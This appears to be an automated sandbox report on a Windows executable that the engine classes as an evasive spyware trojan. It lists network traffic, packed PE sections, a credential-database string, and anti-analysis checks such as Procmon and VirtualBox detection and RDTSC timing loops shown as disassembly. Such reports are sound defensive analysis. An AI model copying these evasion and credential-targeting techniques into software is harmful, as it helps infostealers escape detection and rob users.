                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49711 version: TLS 1.2

                System Summary

                barindex
                Source: FjFeChttqA.exeStatic PE information: section name:
                Source: FjFeChttqA.exeStatic PE information: section name: .rsrc
                Source: FjFeChttqA.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_018BFB750_3_018BFB75
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_018BFB750_3_018BFB75
                Source: FjFeChttqA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: FjFeChttqA.exeStatic PE information: Section: ZLIB complexity 0.9973779965753424
                Source: FjFeChttqA.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\FjFeChttqA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: FjFeChttqA.exe, 00000000.00000003.2107114899.0000000006059000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2107438151.000000000603E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: FjFeChttqA.exeVirustotal: Detection: 67%
                Source: FjFeChttqA.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile read: C:\Users\user\Desktop\FjFeChttqA.exeJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: FjFeChttqA.exeStatic file information: File size 2953728 > 1048576
                Source: FjFeChttqA.exeStatic PE information: Raw size of ratrotcd is bigger than: 0x100000 < 0x2a9200

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\FjFeChttqA.exeUnpacked PE file: 0.2.FjFeChttqA.exe.fa0000.0.unpack :EW;.rsrc :W;.idata :W;ratrotcd:EW;lzuhqlsd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;ratrotcd:EW;lzuhqlsd:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: FjFeChttqA.exeStatic PE information: real checksum: 0x2d31ef should be: 0x2d2409
                Source: FjFeChttqA.exeStatic PE information: section name:
                Source: FjFeChttqA.exeStatic PE information: section name: .rsrc
                Source: FjFeChttqA.exeStatic PE information: section name: .idata
                Source: FjFeChttqA.exeStatic PE information: section name: ratrotcd
                Source: FjFeChttqA.exeStatic PE information: section name: lzuhqlsd
                Source: FjFeChttqA.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_01943990 push esi; iretd 0_3_01943991
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_01926557 push ebp; iretd 0_3_01926558
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_0192765B push es; ret 0_3_019277AA
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_0192B007 push eax; ret 0_3_0192B169
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_01925D76 push esp; retf 0_3_01925D78
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_0192B6FF push ds; ret 0_3_0192B7BA
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_0192AEFD push eax; ret 0_3_0192B169
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_018C3980 push esp; iretd 0_3_018C3981
                Source: C:\Users\user\Desktop\FjFeChttqA.exeCode function: 0_3_018C3980 push esp; iretd 0_3_018C3981
                Source: FjFeChttqA.exeStatic PE information: section name: entropy: 7.980628422807776

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1160754 second address: 116075A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 116075A second address: 1160762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1160762 second address: 1160788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5D692C6EEEh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D692C6EEFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11717EE second address: 117181F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5D68C8C008h 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F5D68C8BFFEh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jng 00007F5D68C8BFF6h 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 117181F second address: 1171827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1171D65 second address: 1171D6F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D68C8BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1171D6F second address: 1171D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D692C6EEDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1174FC6 second address: 1175040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007F5D68C8BFFAh 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F5D68C8BFF8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2321h], eax 0x00000033 mov di, F893h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007F5D68C8BFF8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov dl, 38h 0x00000055 push 0FF15F2Bh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d jmp 00007F5D68C8BFFFh 0x00000062 pop ecx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1175040 second address: 11750DC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5D692C6EE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 0FF15FABh 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F5D692C6EE8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b cld 0x0000002c push 00000003h 0x0000002e call 00007F5D692C6EF0h 0x00000033 pushad 0x00000034 sub dword ptr [ebp+122D1D2Eh], edx 0x0000003a call 00007F5D692C6EEEh 0x0000003f pop edi 0x00000040 popad 0x00000041 pop ecx 0x00000042 or dword ptr [ebp+122D2F3Dh], ebx 0x00000048 push 00000000h 0x0000004a mov dword ptr [ebp+122D354Bh], edi 0x00000050 call 00007F5D692C6EEEh 0x00000055 add dword ptr [ebp+122D31CDh], edx 0x0000005b pop ecx 0x0000005c push 00000003h 0x0000005e mov cx, bx 0x00000061 sbb edi, 3081CC4Ch 0x00000067 push B2C4D33Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e je 00007F5D692C6EE8h 0x00000074 pushad 0x00000075 popad 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11751E7 second address: 1175261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C005h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 59B14E28h 0x00000010 mov ecx, dword ptr [ebp+122D2D22h] 0x00000016 push 00000003h 0x00000018 or edx, dword ptr [ebp+122D2DC6h] 0x0000001e push 00000000h 0x00000020 sub ecx, 20489BD2h 0x00000026 push 00000003h 0x00000028 mov edi, 4DDF7B56h 0x0000002d push F3109140h 0x00000032 jmp 00007F5D68C8C002h 0x00000037 xor dword ptr [esp], 33109140h 0x0000003e mov cx, si 0x00000041 lea ebx, dword ptr [ebp+12450DB3h] 0x00000047 pushad 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D338Eh], ebx 0x00000051 popad 0x00000052 and di, D27Eh 0x00000057 popad 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11752DE second address: 117534E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5D692C6EFAh 0x00000008 jmp 00007F5D692C6EF4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F5D692C6EE8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e jmp 00007F5D692C6EF1h 0x00000033 mov edi, 6A2EE3B2h 0x00000038 push 87DC838Ah 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F5D692C6EF2h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 117534E second address: 11753A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 78237CF6h 0x0000000e movzx ecx, si 0x00000011 push 00000003h 0x00000013 mov si, cx 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D1CD7h] 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F5D68C8BFF8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a js 00007F5D68C8BFF8h 0x00000040 mov ecx, edx 0x00000042 push DF052E33h 0x00000047 push eax 0x00000048 push edx 0x00000049 jbe 00007F5D68C8BFF8h 0x0000004f push esi 0x00000050 pop esi 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11753A1 second address: 11753B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5D692C6EF0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1195DA9 second address: 1195DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F5D68C8BFF6h 0x0000000c jne 00007F5D68C8BFF6h 0x00000012 popad 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 jnp 00007F5D68C8BFF6h 0x0000001c pushad 0x0000001d popad 0x0000001e js 00007F5D68C8BFF6h 0x00000024 popad 0x00000025 jmp 00007F5D68C8C000h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1193B93 second address: 1193BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F5D692C6EF9h 0x0000000c jno 00007F5D692C6EF9h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 jg 00007F5D692C6EE6h 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1193BDC second address: 1193BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194336 second address: 119434C instructions: 0x00000000 rdtsc 0x00000002 js 00007F5D692C6EE6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F5D692C6EE6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 119434C second address: 1194350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194350 second address: 1194356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194356 second address: 1194365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D68C8BFFBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194365 second address: 1194369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194369 second address: 1194394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5D68C8BFFAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5D68C8C003h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194394 second address: 11943A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEBh 0x00000007 jl 00007F5D692C6EE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11944FC second address: 1194500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194880 second address: 1194899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F5D692C6EEBh 0x0000000c jc 00007F5D692C6EE6h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194899 second address: 11948B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5D68C8C006h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11949F9 second address: 1194A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194A03 second address: 1194A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push edi 0x00000007 jmp 00007F5D68C8C008h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194A26 second address: 1194A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194B72 second address: 1194B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194B78 second address: 1194B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194B7C second address: 1194B86 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5D68C8BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194CF4 second address: 1194CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194CF8 second address: 1194D2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C004h 0x00000007 jmp 00007F5D68C8BFFAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5D68C8BFFEh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1194D2A second address: 1194D36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 118A457 second address: 118A45C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 116A951 second address: 116A955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 119557A second address: 119557E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 119557E second address: 1195584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1195584 second address: 119558D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11956E3 second address: 11956E8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1195804 second address: 119580C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 119580C second address: 1195814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1195814 second address: 119581A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 119581A second address: 119581F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 119581F second address: 1195835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5D68C8C001h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1195835 second address: 1195853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F5D692C6EF2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1195853 second address: 1195857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
